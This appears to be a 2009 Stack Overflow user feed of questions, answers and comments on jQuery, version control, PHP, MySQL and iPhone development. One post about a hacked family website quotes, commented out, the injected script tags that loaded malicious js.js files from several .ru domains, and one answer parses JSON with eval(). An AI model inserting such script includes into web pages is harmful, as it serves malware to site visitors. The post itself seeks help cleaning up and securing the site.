User cmcculloh - Stack Overflow most recent 30 from stackoverflow.com 2009-12-02T10:32:59Z http://stackoverflow.com/feeds/user/58 http://www.creativecommons.org/licenses/by-nc/2.5/rdf http://stackoverflow.com/questions/1820986/what-does-a-status-of-p-mean-during-a-tortoise-cvs-update-operation 0 What does a status of "P" mean during a Tortoise CVS Update operation? cmcculloh 2009-11-30T16:51:27Z 2009-11-30T17:01:46Z <p>I ran an "Update" command on a folder with TortoiseCVS and one of the file statuses is "P". What does that mean? I see "U" which I'm assuming means "Update" and "M" which I'm assuming means "Merge". I tried to open the help file but I'm just getting 404s, so I think the firewall at my office is blocking the help contents...</p> <p>Here's a screenshot of what I'm seeing: <img src="http://www.chomperstomp.com/img/whatIsTheP.png" alt="alt text"></p> http://stackoverflow.com/questions/1809275/suppress-jquery-event-handling-temporarily/1809477#1809477 0 Answer by cmcculloh for Suppress jQuery event handling temporarily cmcculloh 2009-11-27T15:52:50Z 2009-11-27T15:52:50Z <p>The simplest way to do this is to add a check at the beginning of the bound method to determine if the method should run. If not, simply return from the method.</p> <pre><code>var doThing = true; $("#foo").bind("click", function(e) { if(!doThing){return;} //do thing } function bar(){ //temp unbind click doThing = false; //do stuff... //rebind click doThing = true; } </code></pre> http://stackoverflow.com/questions/1808234/which-of-these-jquery-selectors-performs-better/1808285#1808285 1 Answer by cmcculloh for Which of these jQuery selectors performs better? cmcculloh 2009-11-27T11:47:43Z 2009-11-27T15:34:27Z <p>For more, see <a href="http://paulirish.com/perf/" rel="nofollow">Paul Irish's Anti-patterns</a> starting at about slide 19.</p> <p>Always descend from an ID if you can. Be more specific on the right and more general on the left.</p> <p>There's a jquery based speed profiler out there that would allow you to test this to see the actual speed differences, but I'm having trouble finding it...</p> http://stackoverflow.com/questions/1808198/changing-checkboxs-parent-element-css-if-checked-or-unchecked/1808216#1808216 0 Answer by cmcculloh for Changing checkbox's parent element css if checked or unchecked cmcculloh 2009-11-27T11:31:30Z 2009-11-27T11:37:42Z <p>Try changing this:</p> <pre><code>$(this).attr("checked") === "true" </code></pre> <p>to this:</p> <pre><code>!!$(this).attr("checked") === true </code></pre> <p>This will convert any non-boolean to a boolean and allow your type safe comparison to work even if the string "true" is returned (if the string false is returned it will evaluate to true though....)</p> http://stackoverflow.com/questions/90/good-branch-merge-tutorials-for-tortoise-svn 16 Good branch/merge tutorials for Tortoise SVN? cmcculloh 2008-08-01T14:41:24Z 2009-11-25T13:08:53Z <p>Anyone know of any really good tutorials explaining branching and merging with Subversion? All the better if it's specific to Tortoise SVN</p> http://stackoverflow.com/questions/484/how-do-you-test-layout-design-across-multiple-browsers-oss 28 How do you test layout design across multiple browsers/OSs? cmcculloh 2008-08-02T16:10:55Z 2009-11-25T13:04:52Z <p>What is a good method for testing website layout designs across multiple browsers and operating systems?</p> http://stackoverflow.com/questions/484/how-do-you-test-layout-design-across-multiple-browsers-oss/485#485 27 Answer by cmcculloh for How do you test layout design across multiple browsers/OSs? cmcculloh 2008-08-02T16:13:52Z 2009-11-25T13:04:52Z <p>Screen capturing services are a great way to do this.</p> <p><a href="http://browsershots.org/" rel="nofollow">http://browsershots.org/</a> is free.</p> <p>and there are some "pay" services like:</p> <p><a href="http://www.browsercam.com" rel="nofollow">http://www.browsercam.com</a> and <a href="http://litmusapp.com" rel="nofollow">http://litmusapp.com</a></p> <p>These kinds of services are nice because they allow you to specify a certain amount of time to wait for the page to load, and allow you have them perform actions (clicking links etc). Then you get a nice array of screenshots you can quickly browse to ensure your site looks like you expected across your desired platforms.</p> <p>Also, there is a service for Firefox that allows you to run sand-boxed versions of multiple browsers on your machine called <a href="http://spoon.net/Browsers/" rel="nofollow">"Browser Sandbox" from spoon.net</a>.</p> http://stackoverflow.com/questions/1795962/jquery-form-validation-available-options/1796285#1796285 2 Answer by cmcculloh for Jquery form validation - available options cmcculloh 2009-11-25T11:18:01Z 2009-11-25T11:50:41Z <ul> <li>required </li> <li>email</li> <li>url</li> <li>date</li> <li>dateISO </li> <li>dateDE</li> <li>number</li> <li>numberDE</li> <li>digits</li> <li>creditcard</li> </ul> <p>That's what I found when I <a href="http://ajax.microsoft.com/ajax/jquery.validate/1.5.5/jquery.validate.js" rel="nofollow">opened up the code (about 2/3 the way down)</a>...</p> http://stackoverflow.com/questions/1794932/extract-section-from-json-in-jquery/1796413#1796413 2 Answer by cmcculloh for Extract section from json in jquery cmcculloh 2009-11-25T11:40:44Z 2009-11-25T11:40:44Z <p>Let's be clear here that JSON is just Javascript Object Notation. So what you have is several objects:</p> <pre><code>{"hashcode":[], "stringMap":{":id":"50",":question":"My roof"}, ":size":"2", ":type":"java.util.HashMap", ":typeId":"123"} </code></pre> <p>Breaking this code down further, we find the following:</p> <pre><code>"hashcode":[] //an empty array named hashcode "stringMap":{":id":"50",":question":"My roof"} //an object named stringMap with two properties, ":id" and ":question" (not sure why the : are there, this is abnormal) ":size":"2"//a string ":size" set to the string "2" (again, what's with the :?) ":type":"java.util.HashMap"//a string ":type" set to the string "java.util.HashMap" ":typeId":"123"//a string ":typeId" set to the string "123" </code></pre> <p>You can normally reference any one of these objects using "dot" notation in Javascript. The whole thing functions a lot like a Java Enum/Hashmap/ArrayList. However, because of those ":" you have throughout it is not going to work. Normally though, you could do the following (<a href="http://pastebin.me/5fa53b1056e5f2386a4fe358400244e2" rel="nofollow">see POC here</a>):</p> <pre><code>&lt;script type="text/javascript"&gt; var jsonString = '{"hashcode":[], "stringMap":{"id":"50","question":"My roof"}, "size":"2", "type":"java.util.HashMap", "typeId":"123"}'; var data = eval("(" + jsonString + ")"); alert(data.stringMap.id); &lt;/script&gt; </code></pre> <p>Note that in order for that code to work, I had to remove the ":" from before "id"...</p> http://stackoverflow.com/questions/1796206/problem-updating-sortables-in-jquery/1796313#1796313 0 Answer by cmcculloh for Problem updating sortables in jquery cmcculloh 2009-11-25T11:22:15Z 2009-11-25T11:22:15Z <p>Have you tried calling refresh? <a href="http://docs.jquery.com/UI/Sortable#method-refresh" rel="nofollow">http://docs.jquery.com/UI/Sortable#method-refresh</a></p> <p>Otherwise, at first glance I might suggest as a temporary fix to call destroy() and then setSortables() each time you drop an item on the list...</p> http://stackoverflow.com/questions/153947/whats-faster-php-vs-asp-vs-jsp-vs-cgi-etc 2 What's faster? PHP vs ASP vs JSP vs CGI etc cmcculloh 2008-09-30T16:49:26Z 2009-11-12T14:09:29Z <p>I'm looking for some metrics. I'm currently tech-editing a book in which the author boldly states that "ASP executes faster than CGI and Perl". It's not backed up by any sources or anything that would lead me to believe that was a fact, so I'm wondering, does anyone know the answer to this question? I've done some google searches, but have not found any solid data as of yet.</p> <p>So, which executes faster? Old school ASP or Perl/CGI? I know these are pretty out-dated tools, so I've thrown PHP and JSP etc into the question title to kind of make this a little more relevant to the community...</p> http://stackoverflow.com/questions/879/php-variables-passed-by-value-or-by-reference 3 PHP Variables passed by value or by reference? cmcculloh 2008-08-03T22:51:41Z 2009-11-08T12:59:12Z <p>I had a Java developer new to PHP ask me this question the other day, so I thought I'd document the answer here.</p> <p>Question: are PHP variables passed by value or by reference?</p> http://stackoverflow.com/questions/1408/make-xampp-apache-serve-file-outside-of-htdocs 5 Make XAMPP/Apache serve file outside of htdocs cmcculloh 2008-08-04T16:54:49Z 2009-10-28T14:56:30Z <p>Is it possible to configure <a href="http://www.apachefriends.org/en/xampp.html" rel="nofollow">xampp</a> to serve up a file outside of the htdocs directory?</p> <p>For instance, say I have a file:</p> <p>C:\projects\transitCalculator\trunk\TransitCalculator.php</p> <p>and my xampp files are normally served out of:</p> <p>C:\xampp\htdocs\</p> <p>(because that's how it's configured by default) Is there some way to make Apache recognize and serve up my TransitCalculator.php file without moving it under htdocs? Preferably I'd like apache to serve up/have access to the entire contents of the projects directory, and I don't want to move the projects directory under htdocs.</p> <p>edit: edited to add Apache to the question title to make Q/A more "searchable"</p> http://stackoverflow.com/questions/826298/good-javascript-a-b-split-testing-package-library 1 Good Javascript A/B (Split) Testing package/library? cmcculloh 2009-05-05T18:31:34Z 2009-10-16T04:44:30Z <p>My boss for some reason wants to try to implement A/B Testing (or Split Testing) in JavaScript. Anyone know of any good JavaScript packages/libraries/solutions to implement A/B Testing?</p> http://stackoverflow.com/questions/2488/auto-generate-database-diagram-mysql 3 Auto Generate Database Diagram MySQL cmcculloh 2008-08-05T15:45:02Z 2009-10-07T10:04:43Z <p>I'm tired of opening Dia and creating a database diagram at the beginning of every project. Is there a tool out there that will let me select specific tables and then create a database diagram for me based on a MySQL database? Preferably it would allow me to edit the diagram afterward since none of the foreign keys are set...</p> <p>Here is what I am picturing diagram-wise (please excuse the horrible data design, I didn't design it. Let's focus on the diagram concept and not on the actual data it represents for this example ;) ):</p> <p><img src="http://www.chomperstomp.com/img/shippingDBDesign.jpg" alt="diagram" title=""> <a href="http://www.chomperstomp.com/img/shippingDBDesign.png" rel="nofollow">see full size diagram</a></p> http://stackoverflow.com/questions/1521443/detect-if-mouse-is-over-an-element-when-page-loads-with-javascript 4 Detect if mouse is over an element when page loads with Javascript cmcculloh 2009-10-05T17:47:47Z 2009-10-05T21:17:13Z <p>I have an image that I want to have trigger certain behaviors when the mouse is over, I have a mouseover and mouseout method, but if you happen to have your mouse over the image when the page loads, the mouseover method never fires until you leave the image and come back over it.</p> <p>Is there a way to detect if the mouse is over an element on the fly without the mouse having to be off of the element and then come over the element to trigger the JS mouseover event? Like is there a document.getElementById("blah").mouseIsOver() type function in Javascript?</p> http://stackoverflow.com/questions/2970/my-website-got-hacked-what-should-i-do 14 My website got hacked... What should I do? cmcculloh 2008-08-05T23:55:25Z 2009-10-01T18:07:28Z <p>My dad called me today and said people going to his website were getting 168 viruses trying to download to their computers. He isn't technical at all, and built the whole thing with a WYSIWYG editor.</p> <p>I popped his site open and viewed the source, and there was a line of Javascript includes at the bottom of the source right before the closing HTML tag. They included this file (among many others): <a href="http://www.98hs.ru/js.js" rel="nofollow">http://www.98hs.ru/js.js</a> &lt;-- TURN OFF JAVASCRIPT BEFORE YOU GO TO THAT URL.</p> <p>So I commented it out for now. It turns out his ftp password was a plain dictionary word six letters long, so we think that's how it got hacked. We've changed his password to an 8+ digit non-word string (he wouldn't go for a passphrase since he is a hunt-n-peck typer).</p> <p>I did a <a href="http://whois.domaintools.com/98hs.ru" rel="nofollow">whois on 98hs.ru</a> and found it is hosted from a server in Chile. There is actually an e-mail address associated with it too, but I seriously doubt this person is the culprit. Probably just some other site that got hacked...</p> <p>I have no idea what to do at this point though as I've never dealt with this sort of thing before. Anyone have any suggestions?</p> <p>He was using plain jane un-secured ftp through webhost4life.com. I don't even see a way to <em>do</em> sftp on their site. I'm thinking his username and password got intercepted?</p> <p><strong>So, to make this more relevant to the community, what are the steps you should take/best practices you should follow to protect your website from getting hacked?</strong></p> <p>For the record, here is the line of code that "magically" got added to his file (and isn't in his file on his computer -- I've left it commented out just to make absolute sure it won't do anything on this page, although I'm sure Jeff would guard against this):</p> <pre><code>&lt;!--script src=http://www.98hs.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.98hs.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.98hs.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.98hs.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.98hs.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.98hs.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.porv.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.98hs.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.porv.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.98hs.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.porv.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.98hs.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.porv.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.98hs.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.98hs.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.porv.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.porv.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.porv.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.porv.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.porv.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.porv.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.porv.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.porv.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.porv.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.porv.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.porv.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.porv.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.porv.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.porv.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.porv.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.porv.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script&gt;&lt;script src=http://www.uhwc.ru/js.js&gt;&lt;/script--&gt; </code></pre> http://stackoverflow.com/questions/799111/how-does-multithreading-on-iphone-os-work-how-do-i-use-it/1415024#1415024 0 Answer by cmcculloh for How does multithreading on iPhone OS work? How do I use it? cmcculloh 2009-09-12T12:40:11Z 2009-09-12T12:40:11Z <p><a href="http://stackoverflow.com/questions/1357108/common-multithreading-mistakes-beginners-make-on-iphone">This post might be a little more helpful...</a></p> http://stackoverflow.com/questions/963304/is-there-a-way-to-tell-server-up-time-from-http-response 1 Is there a way to tell server up time from http response? cmcculloh 2009-06-08T03:04:44Z 2009-08-25T00:08:51Z <p>I'm looking for a way to find out how long a server has been up based only on the page it sends back. Like, if I went to www.google.com, is there some sort of response header variable that tells how long the server I connected to has been up? I'm doubting there is, but never hurts to ask...</p> http://stackoverflow.com/questions/1323623/php-5-3-support-for-strange-code/1323646#1323646 -4 Answer by cmcculloh for PHP 5.3 support for strange '${}' code? cmcculloh 2009-08-24T17:17:54Z 2009-08-24T17:17:54Z <p>You could probably turn off the notices: </p> <p><a href="http://us.php.net/manual/en/function.error-reporting.php" rel="nofollow">http://us.php.net/manual/en/function.error-reporting.php</a> <a href="http://us.php.net/manual/en/errorfunc.configuration.php#ini.error-reporting" rel="nofollow">http://us.php.net/manual/en/errorfunc.configuration.php#ini.error-reporting</a></p> <p>If the pages still work ok, it just sounds like your host has a different setup in their php.ini file...</p> http://stackoverflow.com/questions/1223995/how-to-resolve-command-com-apple-tools-product-pkg-utility-failed-with-exit-co 0 How to resolve "Command <com.apple.tools.product-pkg-utility> failed with exit code -1" error when compiling iPhone App for Device - 3.0 | Release build cmcculloh 2009-08-03T18:52:35Z 2009-08-07T05:27:27Z <p>I recently installed the iPhone OS 3.0 upgrade on my iMac for developing iPhone Apps in XCode. The App I've been developing started throwing errors when I would try and compile for 3.0 (previously worked in 2.2.1). I fixed all of the errors I could, but I am consistently getting the following error:</p> <pre><code>Command &lt;com.apple.tools.product-pkg-utility&gt; failed with exit code -1 </code></pre> <p>Any time I try and compile for the device (even 2.2.1 now...)</p> <p>It works fine in the simulator (building for both release and debug) but will not work for the device (for release or debug).</p> <p>Any help will be much appreciated. Thanks!</p> http://stackoverflow.com/questions/1223995/how-to-resolve-command-com-apple-tools-product-pkg-utility-failed-with-exit-co/1228945#1228945 0 Answer by cmcculloh for How to resolve "Command <com.apple.tools.product-pkg-utility> failed with exit code -1" error when compiling iPhone App for Device - 3.0 | Release build cmcculloh 2009-08-04T17:45:21Z 2009-08-07T05:27:27Z <p>So, it looks like this might be because I installed the "Snow Leopard" version of the 3.0 SDK instead of the "Leopard" version (I'm just a poor ignorant PC guy who has no idea which animal his OS is named after and just wishes the would call it "X.5" or "X.6" to simplify things).</p> http://stackoverflow.com/questions/1229089/which-version-of-the-iphone-3-0-sdk-should-i-download 0 Which version of the iPhone 3.0 SDK should I download? cmcculloh 2009-08-04T18:14:29Z 2009-08-04T23:08:48Z <p>In the developer center there are two different downloads:</p> <ul> <li>iPhone SDK 3.0 (Snow Leopard)</li> <li>iPhone SDK 3.0 (Leopard)</li> </ul> <p>I have Mac OS X 1.5.7, which I believe is Leopard. But when I download the one for Leopard it tells me it can't "mount" it. When I download the one for Snow Leopard, it downloads and installs fine... However, once I'm using it XCode with the Snow Leopard version, it can't compile for the device. I'm thinking that might be because I downloaded the Snow Leopard one instead of the Leopard one. Any ideas? Thanks!</p> http://stackoverflow.com/questions/1105677/wordpress-post-by-e-mail-categorization-tagging-plugin 0 Wordpress post by e-mail categorization tagging plugin? cmcculloh 2009-07-09T18:23:04Z 2009-07-29T11:00:01Z <p>Is there a plugin for wordpress that will parse a post-by-email post and assign it categories/tags automagically?</p> http://stackoverflow.com/questions/583291/recursively-search-directories-moving-specified-file-type-from-one-location-to-an 1 Recursively search directories moving specified file type from one location to another preserving directory structure. cmcculloh 2009-02-24T19:50:13Z 2009-07-19T17:11:07Z <p>Is there some way to specify a directory (let's say "C:\images") and move every .jpg file from there to another directory (say "D:\media") but preserve the directory structure (so if the file were "C:\images\paintball\july\07\headshot.jpg" after moving it would be "D:\media\paintball\july\07\headshot.jpg")?</p> <p>I'm using cygwin (but would be happy to use DOS if that works too).</p> http://stackoverflow.com/questions/1105677/wordpress-post-by-e-mail-categorization-tagging-plugin/1105794#1105794 0 Answer by cmcculloh for Wordpress post by e-mail categorization tagging plugin? cmcculloh 2009-07-09T18:48:26Z 2009-07-09T18:48:26Z <p>This may do the trick:</p> <p><a href="http://mattwalters.net/projects/wordpress-filter/" rel="nofollow">http://mattwalters.net/projects/wordpress-filter/</a></p> http://stackoverflow.com/questions/917932/retrieve-httpresponse-httprequest-status-codes-iphone-sdk 2 Retrieve HTTPResponse/HTTPRequest status codes iPhone SDK? cmcculloh 2009-05-27T20:43:10Z 2009-05-28T00:24:13Z <p>I need to check and evaluate the HTTP Status Codes in my iPhone app. I've got an NSURLRequest object and an NSURLConnection that sucessfully (I think) connect to the site:</p> <pre><code>// create the request NSURLRequest *theRequest=[NSURLRequest requestWithURL:[NSURL URLWithString:@"http://www.apple.com/"] cachePolicy:NSURLRequestUseProtocolCachePolicy timeoutInterval:60.0]; // create the connection with the request // and start loading the data NSURLConnection *theConnection=[[NSURLConnection alloc] initWithRequest:theRequest delegate:self]; if (theConnection) { // Create the NSMutableData that will hold // the received data // receivedData is declared as a method instance elsewhere receivedData=[[NSMutableData data] retain]; } else { // inform the user that the download could not be made } </code></pre> <p>I got this code here: <a href="http://developer.apple.com/iphone/library/documentation/Cocoa/Conceptual/URLLoadingSystem/Tasks/UsingNSURLConnection.html" rel="nofollow">http://developer.apple.com/iphone/library/documentation/Cocoa/Conceptual/URLLoadingSystem/Tasks/UsingNSURLConnection.html</a></p> <p>But it doesn't (as far as I can see) say anything about accessing HTTP Status codes.</p> <p>Anyone have any idea how to make a connection to a site and then check the HTTP Status Codes of that connection?</p> <p>Thanks in advance!</p> http://stackoverflow.com/questions/779403/jsp-or-javascript-equivalent-to-phps-serverhttphost 0 JSP or JavaScript equivalent to PHP's $_SERVER["HTTP_HOST"]? cmcculloh 2009-04-22T21:51:49Z 2009-04-22T22:07:15Z <p>I've go an absolute URL in my JavaScript that I have hard coded for window.location.</p> <p>I don't want to have to change this every time I am testing my app. In PHP I would have handled this by testing the $_SERVER["HTTP_HOST"] variable to find out what server I am on, and adjust accordingly. However, I'm not as familiar with Java and am wondering if it has a similar method? Or if maybe even JavaScript had a similar method?</p> <p>The code is as follows:</p> <pre><code>var url = "http://172.17.1.107/store/results/index.jsp"; window.location = url; </code></pre> <p>What I would like to do is:</p> <pre><code>var server = [something that returns just 172.17.1.107 (with or without the http:// is fine)] var url = "http://" + server + "/store/results/index.jsp"; window.location = url; </code></pre> <p>In PHP I would have just done this:</p> <pre><code>var server = &lt;?= $_SERVER["HTTP_HOST"] ?&gt; var url = "http://" + server + "/store/results/index.php"; window.location = url; </code></pre> <p>Any ideas? I suppose I'm operating under the assumption that you have to do an absolute URL to change the location of the current window in JavaScript. If there is another way to change the window location in JavaScript without an absolute URL, please feel free to offer that as well.</p> <p>Thanks in advance...</p> http://stackoverflow.com/questions/3607/integrating-fogbugz-with-tortoisesvn-with-no-url-subversion-backend 9 Integrating Fogbugz with TortoiseSVN with no URL/Subversion backend cmcculloh 2008-08-06T16:10:44Z 2009-04-22T14:38:06Z <p>I've got TotroiseSVN installed and have a majority of my repositories checking in and out from C:\subversion\ <em>and a couple checking in and out from a network share (I forgot about this when I originally posted this question)</em>.</p> <p>This means that I don't have a "subversion" server per-se.</p> <p>How do I integrate TortoiseSVN and Fogbugz?</p> <p><em>Edit: inserted italics</em></p> http://stackoverflow.com/questions/6340/multiple-foreign-keys 2 Multiple foreign keys? cmcculloh 2008-08-08T20:07:43Z 2009-04-19T17:39:21Z <p>I've got a table that is supposed to track days and costs for shipping product from one vendor to another. We (brilliantly :p) stored both the shipping vendors (FedEx, UPS) with the product handling vendors (Think... Dunder Mifflin) in a "VENDOR" table. So, I have three columns in my SHIPPING_DETAILS table that all reference VENDOR.no. For some reason MySQL isn't letting me define all three as foreign keys. Any ideas?</p> <pre>CREATE TABLE SHIPPING_GRID( id INT NOT NULL AUTO_INCREMENT PRIMARY KEY COMMENT 'Unique ID for each row', shipping_vendor_no INT(6) NOT NULL COMMENT 'Foreign key to VENDOR.no for the shipping vendor (vendors_type must be 3)', start_vendor_no INT(6) NOT NULL COMMENT 'Foreign key to VENDOR.no for the vendor being shipped from', end_vendor_no INT(6) NOT NULL COMMENT 'Foreign key to the VENDOR.no for the vendor being shipped to', shipment_duration INT(1) DEFAULT 1 COMMENT 'Duration in whole days shipment will take', price FLOAT(5,5) NOT NULL COMMENT 'Price in US dollars per shipment lbs (down to 5 decimal places)', is_flat_rate TINYINT(1) DEFAULT 0 COMMENT '1 if is flat rate regardless of weight, 0 if price is by lbs', INDEX (shipping_vendor_no), INDEX (start_vendor_no), INDEX (end_vendor_no), FOREIGN KEY (shipping_vendor_no) REFERENCES VENDOR (no), FOREIGN KEY (start_vendor_no) REFERENCES VENDOR (no), FOREIGN KEY (end_vendor_no) REFERENCES VENDOR (no) ) TYPE = INNODB;</pre> <p><em>Edited to remove double primary key definition...</em></p> http://stackoverflow.com/questions/1820986/what-does-a-status-of-p-mean-during-a-tortoise-cvs-update-operation/1821060#1821060 Comment by cmcculloh on What does a status of "P" mean during a Tortoise CVS Update operation? cmcculloh 2009-11-30T17:10:41Z 2009-11-30T17:10:41Z Chose this as the answer due to it having the table of codes linked. Thanks everyone! http://stackoverflow.com/questions/1795278/creating-object-to-get-expected-json Comment by cmcculloh on Creating object to get expected Json cmcculloh 2009-11-25T11:43:13Z 2009-11-25T11:43:13Z What is with the &quot;:&quot; before the keys? Why &quot;:question&quot; instead of &quot;question&quot;? I don't think that is going to work (at least on the javascript side)... http://stackoverflow.com/questions/327082/excbadaccess-signal-received/328164#328164 Comment by cmcculloh on EXC_BAD_ACCESS signal received cmcculloh 2009-09-11T02:34:04Z 2009-09-11T02:34:04Z Man, coming from PHP this memory management stuff is a challenge. This answer helped a lot though. The code I had: NSDictionary *rowProduct = [self.products objectAtIndex:row]; cell.textLabel.text = [rowProduct objectForKey:@&quot;name&quot;]; cell.detailTextLabel.text = [rowProduct objectForKey:@&quot;cost&quot;]; [rowProduct release]; return cell; Kept throwing this error. As soon as I deleted the [rowProduct release]; line everything worked properly. Hope that was the right thing to do... http://stackoverflow.com/questions/1323623/php-5-3-support-for-strange-code Comment by cmcculloh on PHP 5.3 support for strange '${}' code? cmcculloh 2009-08-24T17:19:04Z 2009-08-24T17:19:04Z Could you post a code sample? http://stackoverflow.com/questions/3057/speed-comparisons-procedural-vs-oo-in-interpreted-languages/3062#3062 Comment by cmcculloh on Speed Comparisons - Procedural vs. OO in interpreted languages cmcculloh 2009-08-24T16:47:55Z 2009-08-24T16:47:55Z I had the boss from hell. He knew nothing about programming, but thought he knew everything (he lectured me on Unix timestamps once, telling me that, &quot;Unix timestamps are like European timestamps. They do it weird, they put the day first and then the month like this: dd/mm/yyyy&quot; ROFL, what an idiot). So when he found out I was doing OO PHP, he flipped out and said it would &quot;slow down our site&quot;. I was looking for any sort of study I could find to prove he was full of it so that I could continue programming OO... http://stackoverflow.com/questions/1105677/wordpress-post-by-e-mail-categorization-tagging-plugin/1111989#1111989 Comment by cmcculloh on Wordpress post by e-mail categorization tagging plugin? cmcculloh 2009-08-24T16:44:01Z 2009-08-24T16:44:01Z This looks like a great plug-in, but not exactly what I was looking for. I don't want the person e-mailing the posts to have to decide what they should be tagged/categorized as... http://stackoverflow.com/questions/153947/whats-faster-php-vs-asp-vs-jsp-vs-cgi-etc/153985#153985 Comment by cmcculloh on What's faster? PHP vs ASP vs JSP vs CGI etc cmcculloh 2009-08-24T16:32:54Z 2009-08-24T16:32:54Z While I agree with what you are saying, I believe the post I marked as &quot;the answer&quot; answers my specific question, which was asking if the statement &quot;ASP executes faster than CGI and Perl&quot; should be included in a textbook on web development I was tech editing... http://stackoverflow.com/questions/328/php-session-security/331#331 Comment by cmcculloh on PHP Session Security cmcculloh 2009-08-18T18:06:37Z 2009-08-18T18:06:37Z Really? Then why in the accepted answer do they mention not to use register globals? Wouldn't, as far as most run-of-the-mill developers are concerned, register globals and form variable handling fall under the umbrella of &quot;sessions&quot; even if it isn't technically part of the &quot;session&quot; object? http://stackoverflow.com/questions/1229089/which-version-of-the-iphone-3-0-sdk-should-i-download Comment by cmcculloh on Which version of the iPhone 3.0 SDK should I download? cmcculloh 2009-08-04T19:43:03Z 2009-08-04T19:43:03Z Sorry, I suppose my high level of stress and frustration must have come across in my comment... http://stackoverflow.com/questions/1229089/which-version-of-the-iphone-3-0-sdk-should-i-download Comment by cmcculloh on Which version of the iPhone 3.0 SDK should I download? cmcculloh 2009-08-04T19:12:59Z 2009-08-04T19:12:59Z Yep. Good call. I hadn't seen that other question before you pointed it out. I was just giving a reason as to why I didn't just delete this question once you pointed the other one out... http://stackoverflow.com/questions/1229089/which-version-of-the-iphone-3-0-sdk-should-i-download Comment by cmcculloh on Which version of the iPhone 3.0 SDK should I download? cmcculloh 2009-08-04T18:39:17Z 2009-08-04T18:39:17Z Yep. I guess this question also has the &quot;mounting failed&quot; problem as well though... http://stackoverflow.com/questions/1135727/which-iphone-sdk-to-download/1135771#1135771 Comment by cmcculloh on Which iPhone SDK to download? cmcculloh 